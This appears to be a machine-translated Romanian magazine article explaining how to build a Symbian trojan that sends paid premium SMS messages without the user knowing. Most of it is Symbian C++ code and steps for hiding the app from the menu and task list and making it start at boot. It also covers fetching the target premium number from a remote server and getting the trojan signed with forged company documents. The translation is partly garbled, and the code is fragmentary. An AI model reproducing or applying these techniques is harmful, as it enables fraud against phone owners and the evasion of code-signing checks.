Un pic de teorie
1. Spyware - programe care îmbină textele mesajelor, jurnalele de apeluri sau
prin sms sau prin trimiterea unui atacator la server. Cu privire la dezvoltarea de similare
programele pe care le-am spus în numerele 93 și 103] [.
2. Trojani-mailer de SMS plătit. Acest software este creat în scopul profitului. În
Cea mai simplă versiune a programului trimite periodic în mod imperceptibil Premium SMS
costă de la 0,5 până la 5 dolari pe număr, înregistrată pentru o falsă juridică
(sau - persoana fizică stângă).
Logica funcționării troianului avansat
Mecanismul de ascundere a programului
Să presupunem că este creată coloana vertebrală de bază a aplicației. Pentru aceasta, ar putea fi
au folosit atât Carbide C ++, cât și Visual Studio.NET cu instalat
superstructură Carbide.VS. Un șablon de bază precum "Symbian Hello World
Aplicație "(observ că în acest articol nu există nici o obligație pentru un SDK specific, deci
puteți utiliza orice SDK pentru orice platformă). Acum mergem la realitate
Ascundeți aplicația din ochii utilizatorului. Pentru a ascunde programul, trebuie să
urmați trei pași simpli:
1) Editați structura care conține informațiile de serviciu despre aplicație și
numit AIF_DATA în Symbain 7.x-8.x și APP_REGISTRATION_INFO în Symbian 9.x. aceasta
structura este o resursă regulată și este de obicei găsită în fișierul de resurse,
care conține UID-ul principal al aplicației. Este necesar să adăugați următoarele simple
înregistrare:
Steagul ascunde pur și simplu pictograma aplicației din meniul dispozitivului.
2) În clasa documentului de aplicație, adăugați definiția funcției virtuale
UpdateTaskNameL, care permite personalizarea afișării pictogramei și a numelui programului
în lista de sarcini:
Void CMegaTroj :: UpdateTaskNameL
(CApaWindowGroupName * aWgName)
CAknDocument :: UpdateTaskNameL (aWgName);
// apelați funcția de sistem UpdateTaskNameL
aWgName-> SetHidden (ETrue);
// Ascundeți aplicația din lista de sarcini
aWgName-> SetSystem (ETrue);
>
3) Pentru Symbian 7/8. Adăugați proprietăți la constructorul de clase de aplicații AppUi
ferestre care îl ascund de ochii utilizatorului:
CEikonEnv :: Static () ->
RootWin (). EnableReceiptOfFocus (EFalse);
// aplicația nu se poate concentra niciodată
CEikonEnv :: Static () ->
RootWin () SetOrdinalPosition (-1000,
ECoeWinPriorityNeverAtFront);
Pentru Symbian 9. Problema în utilizarea codului pentru Symbian 7/8 aici
este că apelarea celei de a doua funcții statice în Symbian 9 blochează orice
activitatea aplicației, inclusiv trimiterea de mesaje. Prin urmare, ne limităm la noi
apelați prima funcție și înlocuiți metoda clasei CAknViewAppUi (din care,
De fapt, clasa de aplicații AppUi este moștenită) - HandleForegroundEventL,
Chemată la momentul în care cererea primește sau pierde focalizare:
void CMegaTrojAppUi :: HandleForegroundEventL
(TBool aForeground)
comutator (aForeground)
caz ETrue:
CeikonEnv :: Static () -> RootWin (). SetOrdinalPosition
(0, ECoeWinPrioritateNormal);
Sarcina TApaTask (iEikonEnv-> WsSession ());
task.SetWgId (CEikonEnv :: Static () ->
RootWin () Identificator ());
task.SendToBackground ();
>
pauză;
>
>
Toate, acum aplicația noastră dispare în siguranță din meniu
dispozitiv, lista de sarcini - și chiar ascunde, în cazul în care utilizatorul brusc oarecum
va găsi fișierul executabil în sistemul de fișiere și va încerca să-l pornească manual.
Implementarea mecanismului de autostart
Programarea autostart va trebui să fie luată în considerare separat pentru Symbian 7/8 și
pentru Symbian 9.
Pentru Symbian 7/8. În sistemul de operare Symbian în versiunea 9.x nu a existat niciun suport explicit
mecanism de autostart, și programatori răi pentru a pune în aplicare planurile lor întunecate
au fost forțați să folosească așa-numitele recunoașteri.
Acest fapt poate fi folosit pentru aplicația autostart. În noi
procedura de pornire automată este după cum urmează:
Procesul este destul de complex pentru percepție, dar codul sursă este, ca de obicei, atașat
pe disc pe jurnal. Aici nu le vom cita din cauza lipsei unui jurnal
loc.
Pentru Symbian 9. Aici, din fericire, totul este mult mai simplu. Să ne forțeze
programul este lansat la începutul mobilului, trebuie să faceți acest lucru:
1) Creați un fișier de resurse (* .Rss), numit de aplicația UID3. În special,
dacă UID3 0x12345678, atunci fișierul de resurse se numește 12345678.rss. El va conține
Resursa următoare:
#include
RESOURCE STARTUP_ITEM_INFO lista neagră
<
executable_name = "c: \\ sys \\ bin \\ YourApp.exe";
recuperare = EStartupItemExPolicyNone;
>
2) În fișierul MMP, adăugați comanda pentru a compila fișierul de resurse:
START RESOURCE 12345678.rss
TARGETPATH \ resource \ apps
END
3) În fișierul pkg, adăugați linia:
În acest caz, directorul c: \ private \ 101f875a \ import funcționează
director, bazat pe conținutul căruia se formează lista autoloaderilor.
Noi, de fapt, am creat o coloană vertebrală bună și universală pentru aproape orice
software util pentru Symbian. Mergem mai departe.
Autodetectați punctul de acces
În opinia mea, aceasta este cea mai dificilă parte. Ideea de bază a implementării mecanismului
este după cum urmează:
2) Începem să sortăm prin fiecare punct de acces din listă, folosind pentru el
testați conexiunea la un server de ecouri de la distanță care trimite clientul
program) exact același set de octeți pe care le-a primit de la acesta. E mai ușor
vorbind, încercăm să trimitem prin octeți de ecou-service 0x01,0x02 și 0x03 și verificăm,
dacă le-am primit înapoi. Condiția pentru primirea acestei combinații de octeți este
necesare și suficiente pentru a identifica faptul că punctul de acces ar putea fi
folosit pentru a vă conecta la server. În cazul oricărui alt rezultat -
timpul de expirare a solicitărilor, codul de eroare etc. - identificăm punctul de acces ca
inoperantă.
3) Salvați identificatorul punctului de acces primit și utilizați-l
pentru a vă conecta la server.
Pentru a obține o listă cu punctele de acces, după cum sa menționat deja,
o instanță a clasei CApSelect. Acesta poate fi facut membru al clasei aplicatiei AppUi si
apelați următorul cod în constructorul AppUi (va fi, prin urmare, apelat
când începe aplicația):
*
CCommsDatabase :: NewL (EDatabaseTypeIAP);
Curățare :: PushL (commDb);
iSelect = CApSelect :: NewLC
(* commDb, KEApIspTypeAll, EApBearerTypeGPRS,
KEApSortNameAscending);
iConnectionEnabled = iSelect-> MoveToFirst ();
CurățareStack :: Pop (iSelect);
CurățareStack :: PopAndDestroy (commDb); // commDb
Aici se conectează la baza de date commDB și se creează o listă cu punctele de acces.
După aceea, setați indexul listei la prima poziție (vă sfătuiesc să studiați
descrierea CApSelect în SDK). Acum puteți testa punctele de acces. Ca a
motorul de sănătate pentru punctul de acces utilizează un motor TCP modificat,
codul sursă al căruia poate fi dus la forum.nokia.com. Modificarea constă în
că se adaugă observatorul de clasă (MtcpipIapCheckEngineObserver), care conține
Singura metodă TestCompleted pe care motorul o solicită când este afișat procesul
sfârșitul testării unui anumit punct de acces. În cazul nostru, de la
MTcpipIapCheckEngineObserver este moștenit de AppUi. De asemenea, nu publicăm aici
textul sursă al motorului CIapCheckTcpEngine, dar este recomandat să îl citiți
(există pe discul nostru). Rețineți că întreaga logică a utilizării unei instanțe a unei clase
CIapCheckTcpEngine în AppUi este de a procesa apelul TestCompleted,
al cărui parametru este tocmai indicatorul succesului sau eșecului
utilizarea punctului de acces. Codul TestCompleted arată astfel:
void CMegaTroyAppUi :: TestCompleted
(TIapTestResult aTestResult)
dacă (aTestResult == EIapNotUsable)
GetNextIapId (); // mergeți la testare
următorul punct de acces
>
altfel
HandleCommandL (EConnectToServer);
// rupe pe server
>
>
După cum puteți vedea, dacă reușim, ne conectăm la server și actualizăm numărul.
Conectați-vă la server și citiți setările
Pentru a putea seta de la distanță numărul de hackeri la care
aveți nevoie pentru a trimite SMS-uri scumpe, biscuiți implementa un fel de admin (a se vedea
imagine).
În general, aceasta este deja o problemă de gust. Principalul lucru este să procesăm corect
server de pe partea aplicației mobile. Este mai ușor să te întorci
forum.nokia.com sau rummage pe discul nostru și citiți codul
http-motor, care vă permite să efectuați solicitări GET. Utilizarea instanței
motorul clasic de la AppUi arată astfel:
Aici iUri este url script-ului care returnează numărul și iIapId este identificatorul punctului
acces, pe care am decis să o folosim. După primirea unui răspuns de la server, trebuie să faceți asta
aveți grijă să salvați numărul într - un fișier sau într - o variabilă locală și
trimiteți SMS-uri.
Mecanismul de trimitere a SMS-urilor
Certificarea aplicației
2) Semnează aplicația pe site-ul Symbian folosind Express Signed sau
Certificat semnat. Diferă expresul semnat de la certificat semnat, astfel încât semnătura
costă mult mai puțin ($ 20) și, de asemenea, nu necesită testarea programului
manual de către specialiștii din centrul de testare. Este necesar să formați pur și simplu un formular cu
informații despre aplicație și despre cererea în sine. Dacă totul se face corect, atunci
vom primi o cerere certificată. Cu toate acestea, atunci se poate
obțineți auditul și certificarea vor fi anulate dacă testerele nu au ceva
se bucură. Certificat Semnat înseamnă testare manuală
specialiști ai centrului de testare. În cazul hackerilor, aceasta nu este deloc o opțiune - este puțin probabil
Fie că va veni la ei pentru a certifica troienii!
1) Închisorul completează un chestionar la adresa trustcenter.de/order/publisherid/dev, intră
informații despre cărțile de credit.
3) Ticălosul trimite scanează de documente ale oricărei entități juridice stângi (este posibil și
antreprenor individual).
4) Hibridul Hitler și Barmaleya de mai sus primește o legătură cu certificatul,
instalarea în browser. Va fi necesară accesarea funcțiilor
Express Semnat de la un cabinet personal de pe site-ul SymbianSigned.com.
Totul, ID-ul editorului este primit. Punctul subtil aici este trimiterea
documentele fondatoare ale unei persoane juridice. De obicei, hackerii caută
posibilitatea de trimitere a documentelor falsificate sau străine. Cum poate
arată practică, Trustcenter nu are capacitatea de a-și verifica autenticitatea,
astfel încât acestea să picteze chiar și în Photoshop. După primirea ID-ului de editor, cracker-ul
Accesul la Express Signed - și abilitatea de a trimite un troian nou scris
pentru semnare. Iată pașii:
1) Softina a turnat semnătura.
3) Hackerul își descarcă rapid software-ul rău de pe site-ul SymbianSigned și începe
pentru a distribui.
4) Poate că troianul intră în audit.
5) Specialiștii din centrul de testare anulează trimiterea, ștergând semnătura
program de pe site și blocați ID-ul editorului.
Chiar dacă vor avea loc elementele 4 și 5 (ceea ce nu este deloc un fapt), atunci, în orice
caz, atacatorul va avea timp să descarce troiul semnat și va fi capabil să îl pornească
popularizare. Pentru a distribui infecția Publisher ID nu este necesară și, chiar dacă este
va bloca, acest lucru este de interes redus, pentru că au făcut-o să documente false.
Deci, aici este o modalitate neobișnuită de a proteja Symbian Platform Security.
Apropo, ai observat că în toate aceste cazuri descriu activitatea unui anumit
"Hacker"? Nu este un accident, așa cum eu nu am făcut niciodată astfel de lucruri cu mine și cu mine
Nu vă sfătuiesc - doar descriem cum se întâmplă. Doar să intri
și știți că cea mai recentă tehnologie de la Symbian nu vă poate proteja
la telefonul mobil sută la sută.
După cum puteți vedea, sarcina de a scrie un troian funcțional pentru Symbian nu este atât de mult
trivial, dar destul de fezabil. Acum amenințarea la adresa securității nu este atât de evidentă în virtutea
relativa complexitate a procedurilor de implementare descrise. Scriitorii de virusi nu sunt încă
a reușit să producă o mulțime de software periculos. Dar de-a lungul timpului o vor produce, deci
utilizatorii de dispozitive mobile ar trebui să acorde mai multă atenție
software instalat, mai ales din surse neconfirmate. În cazul cititorului
interesați în dezvoltarea sau utilizarea unor astfel de "produse"
am reamintit că este o activitate ilegală care poate duce la
consecințe triste!
Scripturile pentru criptografie sunt ascunse în widgeturile LiveHelpNow și au lovit peste 1500 de site-uri
Extortioner qkG criptează numai documente Word și se distribuie automat folosind macrocomenzi
Firefox va avertiza utilizatorii despre vizitarea site-urilor hacked anterior
"Codul securității informațiilor" va avea loc în Astana pentru prima dată
Noile vulnerabilități din Intel ME sunt periculoase pentru dispozitivele Acer, Dell, Fujitsu, HP, Lenovo, Panasonic și așa mai departe
Articole similare
Trimiteți-le prietenilor: